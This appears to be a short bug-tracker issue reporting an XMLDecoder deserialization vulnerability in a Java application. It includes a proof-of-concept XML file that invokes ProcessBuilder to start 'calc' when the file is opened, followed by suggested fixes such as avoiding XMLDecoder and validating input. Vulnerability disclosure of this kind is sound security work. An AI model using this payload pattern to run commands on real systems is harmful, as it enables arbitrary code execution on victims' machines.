There is an XMLDecoder reflection vulnerability #355
Description
open the software, select the open option of FiLE, select the malicious xml to trigger
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1" >
<void index="0">
<string>calc</string>
</void>
</array>
<void method="start"/>
</object>
</java>
Fix measures: do not use XMLDecoder to read files directly, implement a validate function, before the execution of XML decoding (XMLDecoder), check the InputStream object filter, learn the weblogic repair way